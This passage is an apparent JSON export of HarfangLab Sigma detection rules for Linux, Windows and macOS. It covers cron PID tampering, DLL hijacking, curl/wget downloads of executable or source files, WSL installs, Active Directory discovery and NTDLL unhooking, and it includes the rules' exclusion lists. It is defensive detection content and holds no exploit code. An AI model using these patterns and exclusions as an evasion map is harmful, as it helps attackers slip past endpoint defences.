"content": "title: Cron's PID File Modified\nid: bc8e174c-7695-4751-861f-bf32256cc7d4\ndescription: |\n Detects a suspicious attempt to modify \"/var/run/cron.pid\".\n This file is the PID file of the cron daemon, used to manage the system's scheduled tasks.\n A modification of this file by another process than cron can hint at a process masquerading as cron.\n It is recommended to ensure that the process isn't suspicious and has a legitimate reason to modify this file.\nreferences:\n - https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/12/15\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Masquerading\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/var/run/cron.pid'\n - '/run/cron.pid'\n - '/var/run/crond.pid'\n - '/run/crond.pid'\n - TargetPath:\n - '/var/run/cron.pid'\n - '/run/cron.pid'\n - '/var/run/crond.pid'\n - '/run/crond.pid'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_cron:\n ProcessImage:\n - '/usr/bin/cron'\n - '/usr/sbin/cron'\n - '/usr/bin/crond'\n - '/usr/sbin/crond'\n - '/bin/busybox'\n\n filter_daemon_ctl:\n ProcessParentImage: '/sbin/start-stop-daemon'\n ProcessGrandparentImage: '/bin/busybox'\n\n exclusion_common:\n ProcessImage: '/bin/rm'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/crio-conmon|/usr/bin/crio|'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc8e174c-7695-4751-861f-bf32256cc7d4",
"rule_name": "Cron's PID File Modified",
"rule_description": "Detects a suspicious attempt to modify \"/var/run/cron.pid\".\nThis file is the PID file of the cron daemon, used to manage the system's scheduled tasks.\nA modification of this file by another process than cron can hint at a process masquerading as cron.\nIt is recommended to ensure that the process isn't suspicious and has a legitimate reason to modify this file.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-05-26",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc940c5f-0f34-4d9b-86f6-bdf95c4f6608",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600673Z",
"creation_date": "2026-03-23T11:45:34.600676Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600684Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wpcmon.yml",
"content": "title: DLL Hijacking via wpcmon.exe\nid: bc940c5f-0f34-4d9b-86f6-bdf95c4f6608\ndescription: |\n Detects potential Windows DLL Hijacking via wpcmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wpcmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\samcli.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc940c5f-0f34-4d9b-86f6-bdf95c4f6608",
"rule_name": "DLL Hijacking via wpcmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wpcmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc9c8144-794e-4120-bc45-6d1cd92fb32f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613003Z",
"creation_date": "2026-03-23T11:45:34.613007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613014Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_suspicious_file_downloaded_via_curl_wget.yml",
"content": "title: Suspicious File Downloaded via Curl or Wget\nid: bc9c8144-794e-4120-bc45-6d1cd92fb32f\ndescription: |\n Detects when curl or wget is used to download a file with a suspicious extension.\n Attackers often need remote tools or configurations that they might download using curl or wget.\n It is recommended to investigate the downloaded file to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/06/19\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n\n selection_ext:\n - CommandLine|contains:\n - '.c '\n - '.cpp '\n - '.elf '\n - '.o '\n - '.ko '\n - '.so '\n - CommandLine|endswith:\n - '.c'\n - '.cpp'\n - '.elf'\n - '.o'\n - '.ko'\n - '.so'\n\n condition: all of selection_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc9c8144-794e-4120-bc45-6d1cd92fb32f",
"rule_name": "Suspicious File Downloaded via Curl or Wget",
"rule_description": "Detects when curl or wget is used to download a file with a suspicious extension.\nAttackers often need remote tools or configurations that they might download using curl or wget.\nIt is recommended to investigate the downloaded file to determine its legitimacy.\n",
"rule_creation_date": "2024-06-19",
"rule_modified_date": "2025-09-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bcc69e05-74b1-4e8a-a053-2735ce47212e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297312Z",
"creation_date": "2026-03-23T11:45:35.297314Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297318Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/wsl/install",
"https://docs.microsoft.com/en-us/windows/wsl/install-manual",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_distribution_installation.yml",
"content": "title: Linux Distribution Installed Under WSL\nid: bcc69e05-74b1-4e8a-a053-2735ce47212e\ndescription: |\n Detects the installation of a Linux distribution through WSL (Windows Subsystem For Linux).\n WSL allows running Linux binary executables natively on Windows systems.\n While WSL has legitimate uses for development and administration, threat actors may abuse it to evade Windows security controls and execute malicious code.\n It is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\nreferences:\n - https://docs.microsoft.com/en-us/windows/wsl/install\n - https://docs.microsoft.com/en-us/windows/wsl/install-manual\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/01/13\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Lxss\\\\*\\DistributionName'\n\n # This is handled by rule 6bab01c3-5165-4dfd-a77a-42077f50025a\n filter_hacking:\n Details|contains:\n - 'kali-linux'\n - 'Athena'\n - 'ParrotOS'\n\n condition: selection and not 1 of filter_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bcc69e05-74b1-4e8a-a053-2735ce47212e",
"rule_name": "Linux Distribution Installed Under WSL",
"rule_description": "Detects the installation of a Linux distribution through WSL (Windows Subsystem For Linux).\nWSL allows running Linux binary executables natively on Windows systems.\nWhile WSL has legitimate uses for development and administration, threat actors may abuse it to evade Windows security controls and execute malicious code.\nIt is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\n",
"rule_creation_date": "2025-01-13",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bcce9532-5137-41f9-afeb-b3c78f1d562e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617819Z",
"creation_date": "2026-03-23T11:45:34.617821Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617825Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1069_002_dscl_active_directory_macos.yml",
"content": "title: Active Directory Discovered via dscl\nid: bcce9532-5137-41f9-afeb-b3c78f1d562e\ndescription: |\n Detects the execution of the dscl command to list Active Directory accounts or groups.\n Adversaries may attempt to get a listing of domain accounts and groups to determine which domain accounts exist and to determine which users have elevated permissions, such as domain administrators.\n It is recommended to check for malicious behavior by the process launching dscl and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n\nreferences:\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/dscl'\n CommandLine|contains: '/Active Directory/'\n\n exclusion_jamf:\n ParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_haxm:\n GrandparentImage: '/usr/local/haxm/haxm-launcher'\n\n exclusion_landesk:\n GrandparentImage: '/Library/Application Support/LANDesk/bin/ldapm'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bcce9532-5137-41f9-afeb-b3c78f1d562e",
"rule_name": "Active Directory Discovered via dscl",
"rule_description": "Detects the execution of the dscl command to list Active Directory accounts or groups.\nAdversaries may attempt to get a listing of domain accounts and groups to determine which domain accounts exist and to determine which users have elevated permissions, such as domain administrators.\nIt is recommended to check for malicious behavior by the process launching dscl and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002",
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bcf0b2cb-5479-4c69-a09a-83fa7f36b5fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073034Z",
"creation_date": "2026-03-23T11:45:34.073036Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073041Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1569399429777526785",
"https://attack.mitre.org/techniques/T1562/"
],
"name": "t1562_ntdll_loading_from_suspicious_location.yml",
"content": "title: Windows NTDLL Loaded from Suspicious Location\nid: bcf0b2cb-5479-4c69-a09a-83fa7f36b5fa\ndescription: |\n Detects the loading of the Microsoft NT Layer DLL (NTDLL) from a location different than the Windows system folder.\n This can be indicative of userland hooking bypass by loading a fresh, unhooked NTDLL.\n It is recommended to investigate the process loading the NTDLL to look for malicious content or actions.\nreferences:\n - https://twitter.com/SBousseaden/status/1569399429777526785\n - https://attack.mitre.org/techniques/T1562/\ndate: 2022/09/19\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n OriginalFileName: 'ntdll.dll'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_legitimate_image:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\SyChpe32\\' # x86-on-ARM\n - '?:\\Windows\\WinSxS\\'\n # Very weird cases when a host loads an NTDLL present on the mounted\n # disk of another machine...\n - '\\\\\\*\\\\?$\\Windows\\System32\\'\n - '\\\\\\*\\\\?$\\Windows\\SysWOW64\\'\n - '\\\\\\*\\\\?$\\Windows\\SyChpe32\\' # x86-on-ARM\n - '\\\\\\*\\\\?$\\Windows\\WinSxS\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n exclusion_mediview:\n ImageLoaded|startswith:\n - '?:\\Mediview\\resources\\utils\\mben\\'\n - '?:\\Mediview\\resources\\utils\\imageenhance\\'\n\n exclusion_safe_os:\n ImageLoaded: '?:\\$WINDOWS.~BT\\Sources\\SafeOS\\SafeOS.Mount\\Windows\\System32\\ntdll.dll'\n\n exclusion_vss:\n ImageLoaded: '\\\\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\System32\\ntdll.dll'\n\n exclusion_ccmexec:\n # C:\\Windows\\SoftwareDistribution\\Download\\2bb04f6f8c5f4e57fe18b3aa6b335e19\\amd64_microsoft-windows-ntdll_31bf3856ad364e35_6.1.7601.24260_none_b74c23c82c1754c1\\ntdll.dll\n ImageLoaded: '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\amd64_microsoft-windows-ntdll*'\n ProcessImage: '?:\\WINDOWS\\CCM\\CcmExec.exe'\n\n exclusion_dlservice:\n ProcessImage:\n - '?:\\Program Files\\DeviceLock Agent\\DLService.exe'\n - '?:\\Program Files (x86)\\DeviceLock\\DeviceLock Agent\\DLService.exe'\n - '?:\\Program Files\\BackupClient\\DeviceLock\\DLService.exe'\n - '?:\\Program Files (x86)\\BackupClient\\DeviceLock\\DLService.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Acronis International GmbH'\n - 'DeviceLock, Inc'\n # ImageLoaded: '?:\\Program Files\\DeviceLock Agent\\DL????.tmp'\n\n exclusion_windows_sandbox:\n ImageLoaded|startswith: '\\Device\\vmsmb\\VSMB-'\n\n exclusion_gameguard_gamemon:\n # C:\\Program Files (x86)\\Steam\\steamapps\\common\\Summoners War Chronicles\\GameGuard\\GameMon.des\n ProcessSigned: 'true'\n ProcessSignature: 'INCA Internet Co.,Ltd.'\n ProcessImage:\n - '*\\GameGuard\\GameMon64.des'\n - '*\\GameGuard\\GameMon.des'\n\n exclusion_devicelock:\n ProcessImage:\n - '?:\\Program Files\\DeviceLock Agent\\DLService.exe'\n - '?:\\Program Files\\BackupClient\\DeviceLock\\DLPService.exe'\n ProcessCompany:\n - 'DeviceLock, Inc'\n - 'Acronis International GmbH'\n ImageLoaded:\n - '?:\\Program Files\\DeviceLock Agent\\\\*.tmp'\n - '?:\\Program Files\\BackupClient\\DeviceLock\\\\*.tmp'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bcf0b2cb-5479-4c69-a09a-83fa7f36b5fa",
"rule_name": "Windows NTDLL Loaded from Suspicious Location",
"rule_description": "Detects the loading of the Microsoft NT Layer DLL (NTDLL) from a location different than the Windows system folder.\nThis can be indicative of userland hooking bypass by loading a fresh, unhooked NTDLL.\nIt is recommended to investigate the process loading the NTDLL to look for malicious content or actions.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd1ecd51-88ca-462b-97a4-f0fa469ff509",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618170Z",
"creation_date": "2026-03-23T11:45:34.618172Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618176Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_untrusted_process_execution.yml",
"content": "title: Untrusted Process Executed from an Uncommon Location\nid: bd1ecd51-88ca-462b-97a4-f0fa469ff509\ndescription: |\n Detects an unsigned or self-signed binary being launched from an uncommon folder.\n Attackers may use unsigned or self-signed binaries in order to execute malicious commands and bypass defenses.\n It is recommended to check any children of this process and the activities of the parent for other malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/07/22\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_folder:\n Image|startswith:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Library/PrivilegedHelperTools/'\n\n selection_unsigned:\n - Signed: 'false'\n - Signed: 'true'\n CodesigningFlagsStr|contains: 'CS_ADHOC'\n\n exclusion_homebrew:\n - ProcessParentImage|startswith:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n - ProcessGrandparentImage|startswith:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n - ProcessParentCommandLine|contains:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n - ProcessGrandparentCommandLine|contains:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n\n exclusion_nix:\n - ProcessImage|startswith: '/nix/store/'\n ProcessSigned: 'true'\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n - ProcessParentImage|startswith: '/nix/store/'\n ProcessParentSigned: 'true'\n ProcessParentCodesigningFlagsStr|contains: 'CS_ADHOC'\n - ProcessImage|startswith: '/private/tmp/nix-build-'\n\n exclusion_cleanmymac:\n SignatureSigningId: 'com.macpaw.CleanMyMac4.Agent'\n Image: '/Library/PrivilegedHelperTools/com.macpaw.CleanMyMac4.Agent'\n Signed: 'true'\n CodesigningFlagsStr|contains: 'CS_ADHOC'\n\n exclusion_epicgames:\n Image|startswith: '/Users/Shared/Epic Games/UE_*/Engine/'\n\n exclusion_parallels:\n Image|startswith: '/Users/Shared/Parallels/'\n\n exclusion_tunnelin:\n Image: '/private/etc/tunnelin_client/tunnelin_client'\n\n exclusion_openssl:\n Image: '/private/tmp/openssl*/openssl-*/*'\n\n exclusion_docker:\n Image: '/Library/PrivilegedHelperTools/com.docker.socket'\n\n exclusion_pkinstall:\n Image|startswith: '/private/tmp/PKInstallSandbox.'\n\n exclusion_cmake:\n Image|startswith: '/private/tmp/cmake'\n\n exclusion_bazel:\n - GrandparentImage|startswith: '/private/var/tmp/_bazel*/'\n - ParentImage|startswith: '/private/var/tmp/_bazel*/'\n - Image|startswith: '/private/var/tmp/_bazel*/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd1ecd51-88ca-462b-97a4-f0fa469ff509",
"rule_name": "Untrusted Process Executed from an Uncommon Location",
"rule_description": "Detects an unsigned or self-signed binary being launched from an uncommon folder.\nAttackers may use unsigned or self-signed binaries in order to execute malicious commands and bypass defenses.\nIt is recommended to check any children of this process and the activities of the parent for other malicious behavior.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-10-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd421807-c4fb-499a-8693-4f2cabebf246",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586675Z",
"creation_date": "2026-03-23T11:45:34.586679Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586687Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_snippingtool.yml",
